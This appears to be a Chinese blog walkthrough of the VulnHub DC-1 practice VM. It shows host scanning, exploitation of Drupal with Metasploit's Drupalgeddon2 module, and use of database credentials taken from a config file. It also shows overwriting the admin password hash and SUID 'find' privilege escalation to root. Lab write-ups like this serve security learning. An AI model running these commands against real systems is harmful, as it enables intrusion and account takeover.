码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【Try to Hack】vulnhub DC1


    📒博客主页:开心星人的博客主页
    🔥系列专栏:Try to Hack
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年6月25日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    靶场下载和安装

    下载地址:https://www.vulnhub.com/entry/dc-1-1,292/
    在这里插入图片描述
    我也不太懂,我选了第二个,可以用

    用vmmare打开DC-1.ova
    在这里插入图片描述
    在这里插入图片描述
    选设置
    在这里插入图片描述
    要选NAT模式

    kali也要选NAT模式,这样攻击机和靶机就处于同一内网

    开始渗透

    主机发现
    netdiscover
    nmap -sP
    arp-scan -l
    这里用netdiscover
    在这里插入图片描述
    太大太小的可能是网关,可以看【Try to Hack】ip地址
    所以DC-1 的ip为192.168.88.138

    信息收集
    nmap -sV 192.168.88.138
    在这里插入图片描述
    浏览器看看80端口
    在这里插入图片描述

    drupal这个cms搭建的
    在这里插入图片描述

    直接上msf
    msfconsloe
    在这里插入图片描述
    search drupal
    在这里插入图片描述
    随便选择一个模块(基本上都能拿到shell)
    use exploit/unix/webapp/drupal_drupalgeddon2
    在这里插入图片描述
    show options
    在这里插入图片描述
    set rhost 192.168.88.138 靶机的ip

    run
    在这里插入图片描述

    拿到了shell

    使用python获得一个交互式的shell
    python -c 'import pty;pty.spawn("/bin/bash")'
    在这里插入图片描述
    在这里插入图片描述
    拿到了第一个flag1

    提示我们看配置文件
    在这里插入图片描述
    在这里插入图片描述
    拿到了第二个flag,并获得下一步的提示

    还看到了数据库的账号和密码
    mysql -u dbuser -p
    输入密码
    R0ck3t
    在这里插入图片描述

    进入数据库了
    show databases;
    在这里插入图片描述
    show tables from drupaldb;
    在这里插入图片描述
    看users表
    use drupaldb
    select * from users;
    在这里插入图片描述
    看到了admin和密码的hash
    说实话我确实看不出来这是哪种hash算法,想尝试破解这个密码,但是弄不出来
    看wp
    在scripts录有password-hash.sh文件,可以用该文件生成自己的密码hash值替换数据库hash
    给了有hash的算法
    php scripts/password-hash.sh 12345
    在这里插入图片描述
    获得12345的hash

    替换数据库中的密码
    update drupaldb.users set pass="$S$D1K11z6Umizyw8cxeck4ZVfihCCk41tqi4fEV6e5Tk6lMp8dAaBm" where name="admin";
    在这里插入图片描述
    成功

    在这里插入图片描述
    登录进入后台了

    在这里插入图片描述
    找了好一会,找到了flag3
    在这里插入图片描述
    suid之find提权 Try to Hack】Linux suid提权

    查找拥有suid权限的二进制文件
    find / -perm -u=s -type f 2>/dev/null
    在这里插入图片描述
    /usr/bin/find . -exec /bin/sh \;
    在这里插入图片描述
    提权成功
    一个flag在/etc/passwd里,一个在/root下
    在这里插入图片描述
    在这里插入图片描述
    结束

  • 相关阅读:
    Rocky Linux 运维工具yum
    计算机毕业设计-基于SSM的网上书店管理系统
    Vue3的7种和Vue2的12种组件通信
    中文分词的词典中的词性标记
    银河麒麟v10 服务器 和统信20 1050e 服务器 安装oracle 19c实战(适配成功)
    品味奢华 匠心独韵——飞利浦Fidelio T1设计与声音的哲学
    MySQL基础学习总结(四)
    一文总结 MetaQ/RocketMQ 原理
    flutter简单的本地草稿箱功能
    C#(Csharp)我的基础教程(二)(我的菜鸟教程笔记)-属性和字段的探究与学习
  • 原文地址:https://blog.csdn.net/qq_55675216/article/details/125249818
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号